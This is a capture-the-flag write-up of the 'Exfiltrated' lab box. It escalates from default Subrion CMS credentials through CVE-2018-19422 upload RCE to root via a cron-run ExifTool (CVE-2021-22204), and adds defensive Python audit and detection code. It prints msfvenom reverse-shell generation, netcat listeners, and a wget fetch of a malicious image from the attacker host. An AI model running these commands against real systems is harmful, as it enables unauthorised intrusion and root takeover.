
Exfiltrated

Proving Grounds Easy Linux October 28, 2025
subrion-cms authenticated-rce exiftool cron-jobs cve-2018-19422 cve-2021-22204

Summary

TL;DR Exfiltrated is an Easy Linux box featuring a Subrion CMS installation vulnerable to authenticated RCE (CVE-2018-19422). After gaining initial access with default credentials, the privilege escalation path involves exploiting a cron job that processes images with a vulnerable version of ExifTool (CVE-2021-22204), allowing arbitrary command execution as root through malicious image metadata.

Key Vulnerabilities:

  • Subrion CMS with default credentials (admin:admin)
  • Authenticated RCE in Subrion CMS (CVE-2018-19422)
  • ExifTool arbitrary code execution (CVE-2021-22204)
  • Cron job processing user-uploaded images with vulnerable ExifTool

Enumeration

Nmap Scan

Initial scan:

nmap -vv -T5 -p- 192.168.x.x

nmap -vv -T5 -p22,80 -sC -sV 192.168.x.x

Results:

Port  Service  Proto
22    SSH      TCP
80    HTTP     TCP

Key findings:

  • Limited attack surface with only SSH and HTTP exposed
  • Web application requires enumeration

Web Enumeration

Step 1: Accessing the web application immediately reveals Subrion CMS

Subrion CMS Subrion is an open-source content management system written in PHP. Older releases, notably 4.2.1, have known authenticated remote code execution paths, the best documented being arbitrary file upload through the admin panel (CVE-2018-19422). The admin panel is reachable at /panel/, so the first question is whether the default login still works.

Step 2: Test default credentials

Username: admin
Password: admin

Result: ✅ Successfully authenticated with default credentials!


Initial Foothold

Vulnerability Discovery

Vulnerability: CVE-2018-19422 - Subrion CMS Authenticated RCE

CVE-2018-19422 In Subrion CMS 4.2.1 the admin panel's file manager (/panel/uploads) accepts uploads with extensions such as .phar and .pht, and the upload directory's .htaccess does not block them, so the web server still executes them as PHP. Any authenticated panel user can therefore drop a PHP shell. Admin access also opens other routes to code execution (the eval() hook tried below is one), which is why several different public exploits exist for the same CVE.

Exploitation Attempts

Attempt 1: Manual exploitation following GitHub issue #909

  • Added an eval() hook to index.php
  • Command execution worked
  • The hook was not a practical route to a full interactive shell

Attempt 2: Various automated exploits

  • Some exploits only provided a pseudo-shell (one command per request)
  • Upgrading that to an interactive shell proved difficult
  • A method that uploads a real file was needed

Attempt 3 (Success): File upload RCE exploit

Found excellent exploit by Drew-Alleman that supports file upload.

Step 1: Run the exploit to upload PHP reverse shell

# Generate PHP reverse shell
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw > shell.php

# Use exploit to upload
python3 exploit.py --url http://192.168.x.x --user admin --pass admin --file shell.php

Step 2: Start listener and trigger shell

# Start listener
nc -lvnp 4444

# Access uploaded shell through browser
curl http://192.168.x.x/uploads/shell.php


Shell Access Successfully obtained reverse shell as www-data

Privilege Escalation

Initial Enumeration Miss

Critical mistake: Failed to properly enumerate cron jobs during initial enumeration.

The discovery: Root cron job at /etc/crontab

Cron Job Analysis A cron job running as root uses ExifTool to process image files from a directory that www-data can write to. Whenever a root process parses user-controlled files, any bug in that parser becomes a privilege escalation, so the ExifTool version decides everything here.
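The check the author wishes they had run earlier, as an added example (not code from the writeup or from any tool it uses): a Python audit that parses system crontab lines, keeps the jobs that run as root, follows a job that runs a script into that script's text, and reports every path the current user could write to. The crontab, the script and the set of "writable" paths below are constructed for the demo; on a real host live_findings() reads /etc/crontab and asks os.access instead.

```python
"""
Added example, not from the writeup: audit system cron entries for the pattern
this box turns into a root shell, a job running as root that executes, or reads
input from, a location the current user can write to.

Handles the /etc/crontab and /etc/cron.d/* layout (field 6 is the user).
Per-user crontabs (no user field) are a different format and are not handled.
"""
import os
import re
from dataclasses import dataclass

# An absolute path token; stops at whitespace, quotes, globs and shell operators.
PATH_RE = re.compile(r"/[A-Za-z0-9._@+-][A-Za-z0-9._@/+-]*")


@dataclass
class CronJob:
    schedule: str
    user: str
    command: str


def parse_system_crontab(text):
    """Jobs from system-crontab text. Skips comments, blank lines and NAME=value
    lines; accepts both '* * * * * user cmd' and '@reboot user cmd'."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"[A-Za-z_]\w*=", line):
            continue
        n_sched = 1 if line.startswith("@") else 5
        parts = line.split(None, n_sched + 1)
        if len(parts) < n_sched + 2:
            continue  # malformed line
        jobs.append(CronJob(" ".join(parts[:n_sched]), parts[n_sched], parts[n_sched + 1]))
    return jobs


def paths_in(text):
    """Absolute paths mentioned in a command line or script body, trailing '/' removed."""
    return [m.group(0).rstrip("/") for m in PATH_RE.finditer(text)]


def root_job_findings(jobs, is_writable, read_text):
    """(job command, path, how) for every path a root job touches that we can write,
    or whose parent directory we can write. is_writable(path) -> bool and
    read_text(path) -> str or None are injected so the same logic runs against a
    live host or against constructed data."""
    findings = []
    for job in jobs:
        if job.user != "root":
            continue
        candidates = [(p, "cron line") for p in paths_in(job.command)]
        for p in paths_in(job.command):
            body = read_text(p)  # a script named on the cron line: look inside it too
            if body:
                candidates += [(q, f"inside {p}") for q in paths_in(body)]
        seen = set()
        for p, where in candidates:
            if p in seen:
                continue
            seen.add(p)
            if is_writable(p):
                findings.append((job.command, p, f"writable ({where})"))
            elif is_writable(os.path.dirname(p)):
                findings.append((job.command, p, f"parent dir writable ({where})"))
    return findings


def live_findings(crontab_path="/etc/crontab"):
    """Run the audit on the current host as the current user."""
    with open(crontab_path) as fh:
        jobs = parse_system_crontab(fh.read())

    def read_text(p):
        try:
            with open(p, "rb") as fh:
                head = fh.read(65536)
            return head.decode("utf-8") if b"\x00" not in head else None
        except (OSError, UnicodeDecodeError):
            return None

    return root_job_findings(jobs, lambda p: os.access(p, os.W_OK), read_text)


# --- constructed sample data for the demo (placeholder paths, not the box's) ---
SAMPLE_CRONTAB = """\
# constructed sample in /etc/crontab layout
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root     cd / && run-parts --report /etc/cron.hourly
*/1 *   * * *   root     bash /opt/process-images.sh
@reboot         www-data touch /tmp/booted
"""

SAMPLE_SCRIPT = """\
#!/bin/bash
# constructed: strips metadata from every upload (the pattern behind the root shell)
for f in /srv/app/uploads/*; do
    exiftool -all= "$f"
done
"""


def demo():
    """Audit the constructed data as a low-privileged user who can only write the upload dir."""
    jobs = parse_system_crontab(SAMPLE_CRONTAB)
    writable = {"/srv/app/uploads"}
    scripts = {"/opt/process-images.sh": SAMPLE_SCRIPT}
    return root_job_findings(jobs, writable.__contains__, scripts.get)


if __name__ == "__main__":
    for command, path, how in demo():
        print(f"root job '{command}' depends on {path}: {how}")
```

The cron line itself only names the script, and the script is root-owned; the finding comes from following the script into the directory it globs, which is the step a quick `cat /etc/crontab` skips.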

ExifTool Vulnerability

Step 1: Identify ExifTool version

exiftool -ver


Step 2: Research ExifTool vulnerabilities

Found CVE-2021-22204 - ExifTool Arbitrary Code Execution

CVE-2021-22204 ExifTool 7.44 through 12.23 (fixed in 12.24) parses DjVu annotation chunks by feeding an insufficiently sanitised string to Perl's eval(), so a crafted annotation executes arbitrary Perl, and with it shell commands. The DjVu data can be wrapped inside a JPEG and still reach the vulnerable parser, so an ordinary-looking image is enough. Any process that runs ExifTool on attacker-supplied files inherits the impact; here that process runs as root.

Step 3: Understand the exploit

The vulnerability works by:

  1. Crafting a DjVu annotation chunk whose quoted string carries the payload (the PoC wraps the DjVu data inside a JPEG, which is why its output is image.jpg)
  2. Embedding a reverse shell command in that payload
  3. Placing the file where the root cron job will pick it up
  4. ExifTool executing the payload, as root, when it parses the annotation
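To make the mechanism concrete, an added example (not the PoC's code and not part of the original writeup): a Python scanner that walks the IFF chunk layout of a DjVu stream, whether standalone or embedded in another file such as a JPEG, extracts uncompressed ANTa annotation text and flags the Perl interpolation sequences (`${...}`, `@{...}`) that ExifTool's eval() turned into code execution, plus a check of the affected version range. The sample DjVu and annotation strings are constructed here; the "payload" is a harmless marker, not a working shell, and BZZ-compressed ANTz annotations are reported but not decoded.

```python
"""
Added example, not from the writeup or the ExifTool project: locate and flag
CVE-2021-22204-style annotations in DjVu data.

DjVu is an IFF container: 'AT&T' magic, then a FORM chunk whose children are
4-byte id + 4-byte big-endian length + payload (padded to an even length).
Uncompressed annotations live in ANTa chunks as S-expression text; ExifTool
<= 12.23 built each quoted string with a Perl eval, so '${...}' / '@{...}'
inside the text (the public bypass uses '\\c' to swallow the protecting
backslash in front of '$') became code execution.
"""
import re
import struct

DJVU_SIG = b"AT&TFORM"
# Perl interpolation in a double-quoted string: ${ ... } or @{ ... }
INTERP_RE = re.compile(r"[$@]\{")


def iff_chunks(data, offset, end):
    """Yield (chunk_id, payload) for chunks in data[offset:end], descending into FORMs."""
    while offset + 8 <= end:
        cid = data[offset:offset + 4]
        (length,) = struct.unpack(">I", data[offset + 4:offset + 8])
        start = offset + 8
        stop = min(start + length, end)  # never trust the length field past the buffer
        if cid == b"FORM":
            # first 4 payload bytes are the form type (DJVU, DJVM, ...); children follow
            yield from iff_chunks(data, start + 4, stop)
        else:
            yield cid, data[start:stop]
        offset = stop + (length & 1)  # chunks are padded to an even boundary


def annotations(blob):
    """[(kind, text_or_None)] for every annotation chunk in every DjVu stream in blob:
    'ANTa' with decoded text, or 'ANTz' (BZZ-compressed, not decoded here).
    The stream may sit anywhere in blob, e.g. inside a JPEG's EXIF segment."""
    found = []
    pos = blob.find(DJVU_SIG)
    while pos != -1 and pos + 12 <= len(blob):
        (form_len,) = struct.unpack(">I", blob[pos + 8:pos + 12])
        end = min(pos + 12 + form_len, len(blob))
        for cid, payload in iff_chunks(blob, pos + 4, end):
            if cid == b"ANTa":
                found.append(("ANTa", payload.decode("latin-1")))
            elif cid == b"ANTz":
                found.append(("ANTz", None))
        pos = blob.find(DJVU_SIG, end)
    return found


def suspicious_annotations(blob):
    """ANTa texts containing Perl interpolation, i.e. what reached eval() in ExifTool."""
    return [text for kind, text in annotations(blob) if text and INTERP_RE.search(text)]


def exiftool_is_vulnerable(version):
    """CVE-2021-22204 affects ExifTool 7.44 through 12.23; 12.24 fixed it.
    `version` is the string printed by `exiftool -ver`, e.g. '12.23'."""
    major, minor = (int(x) for x in version.strip().split(".")[:2])
    return (7, 44) <= (major, minor) <= (12, 23)


# --- constructed sample data for the demo -----------------------------------

def _chunk(cid, payload):
    pad = b"\x00" if len(payload) & 1 else b""
    return cid + struct.pack(">I", len(payload)) + payload + pad


def build_djvu(annotation):
    """Minimal single-page DjVu: magic, FORM:DJVU, a 10-byte INFO chunk (placeholder
    geometry values) and one ANTa chunk carrying `annotation`."""
    info = struct.pack(">HHBBHBB", 1, 1, 26, 0, 300, 22, 1)
    return b"AT&T" + _chunk(b"FORM", b"DJVU" + _chunk(b"INFO", info) + _chunk(b"ANTa", annotation))


BENIGN_ANT = b'(metadata (Author "alice"))'
# Shape of the public bypass: \c consumes the protecting backslash, leaving ${...} live.
# The command inside is a harmless marker here, not a shell payload.
MARKER_ANT = b'(metadata (Author "\\c${system(\'echo marker\')};"))'


def demo():
    """Scan each sample both as a bare .djvu and wrapped in a fake JPEG container."""
    results = {}
    for name, ant in (("benign", BENIGN_ANT), ("marker", MARKER_ANT)):
        djvu = build_djvu(ant)
        wrapped = b"\xff\xd8\xff\xe1" + b"\x00" * 16 + djvu + b"\xff\xd9"
        results[name] = (bool(suspicious_annotations(djvu)), bool(suspicious_annotations(wrapped)))
    return results


if __name__ == "__main__":
    print("exiftool 12.23 vulnerable:", exiftool_is_vulnerable("12.23"))
    print(demo())
```

Run against real uploads, a hit in suspicious_annotations() is the file to quarantine; an ANTz entry means the annotation is compressed and needs a BZZ decoder (or ExifTool 12.24 or later) before it can be judged.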

Exploitation

Found PoC: CVE-2021-22204 ExifTool exploit

Step 1: Clone and prepare the exploit

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool
cd CVE-2021-22204-exiftool

Step 2: Edit the exploit script to add reverse shell details


# Modified exploit.py
LHOST = "10.10.14.5"
LPORT = "4445"

Step 3: Generate the malicious image

python3 exploit.py


This generates a file named image.jpg with the embedded payload.

Note: The payload isn’t visible in the image itself - it’s embedded in the metadata.


Step 4: Upload the malicious image to the target

# On target as www-data: fetch image.jpg from a web server on the attacker box (port 8000)
cd /path/to/upload/directory
wget http://10.10.14.5:8000/image.jpg


Step 5: Start listener and wait for cron job

# Start listener
nc -lvnp 4445

# Wait for the cron job to process the image (usually within a minute)

Root Access Successfully obtained a root shell when the cron job processed the malicious image

Post-Exploitation

Flags:

  • User: Located in /home/*/local.txt
  • Root: Located in /root/proof.txt

Attack Chain Summary:

  1. Web enumeration reveals Subrion CMS
  2. Default credentials provide authenticated access
  3. CVE-2018-19422 exploited for file upload RCE
  4. Initial shell obtained as www-data
  5. Cron job enumeration reveals root process using ExifTool
  6. ExifTool version identified as vulnerable to CVE-2021-22204
  7. Malicious image crafted with embedded reverse shell
  8. Image uploaded to directory processed by cron
  9. ExifTool executes payload, providing root shell

Key Lessons:

  • Always test default credentials (admin:admin, admin:password, etc.)
  • Multiple exploitation methods exist for the same vulnerability - try different approaches
  • Cron job enumeration is critical for privilege escalation
  • Image processing tools (ExifTool, ImageMagick) are common privilege escalation vectors when run by a privileged job on user-supplied files
  • A malicious file can still be a valid image: a metadata payload passes the extension and MIME checks that stop ordinary upload attacks
  • Some exploits require modification (IP/port) before use
  • Patience is required for cron-based exploits (wait for scheduled execution)

Timeline

graph LR
    A[Nmap Scan] --> B[Web Enum]
    B --> C[Subrion CMS]
    C --> D[Default Creds]
    D --> E[CVE-2018-19422]
    E --> F[File Upload RCE]
    F --> G[www-data Shell]
    G --> H[Cron Enum]
    H --> I[ExifTool Found]
    I --> J[CVE-2021-22204]
    J --> K[Malicious Image]
    K --> L[Root Shell]

Pwned on: 28/10/2025

Difficulty Rating: ⭐⭐⭐ (Requires understanding of metadata exploitation)
Fun Factor: ⭐⭐⭐⭐ (Excellent learning experience with ExifTool CVE)